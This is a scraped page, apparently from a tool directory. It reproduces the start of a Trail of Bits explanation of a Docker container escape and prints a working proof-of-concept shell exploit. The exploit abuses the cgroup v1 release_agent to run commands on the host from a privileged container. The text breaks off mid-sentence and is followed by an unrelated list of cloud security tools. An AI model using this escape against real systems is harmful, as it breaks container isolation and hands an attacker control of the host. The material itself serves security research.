
Understanding Docker container escapes


Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes. Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature. Here’s a version of the PoC that launches ps on the host:

    # spawn a new container to exploit via:
    # docker run --rm -it --privileged ubuntu bash
    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
    mkdir -p $d/w;echo 1 >$d/w/notify_on_release
    t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
    touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh ps >'"$t/o" >/c;
    chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and

ALTERNATIVES

Cloud security platform that provides configuration monitoring, compliance management, and security analysis across multi-cloud environments.

Commercial

Implements a cloud version of the Shadow Copy attack against domain controllers in AWS, allowing theft of domain user hashes.

Cloud Custodian (c7n) is a rules engine for managing public cloud accounts and resources with a focus on security, compliance, and cost optimization.

A cloud security platform that combines Kubernetes security scanning, runtime monitoring, and cloud security posture management using Kubescape and eBPF technology.

Commercial

LogRhythm SIEM is a comprehensive security information and event management platform that collects, analyzes, and responds to security events across an organization's IT infrastructure.

Commercial

A cloud and database asset intelligence platform that provides continuous monitoring, compliance management, and security posture assessment across hybrid cloud environments.

Commercial

Open-source policy-as-code software for multi-cloud and SaaS environments with GPT model conversations and custom analysis policies.

Cloudmarker is a cloud monitoring tool and framework that audits Azure and GCP cloud environments.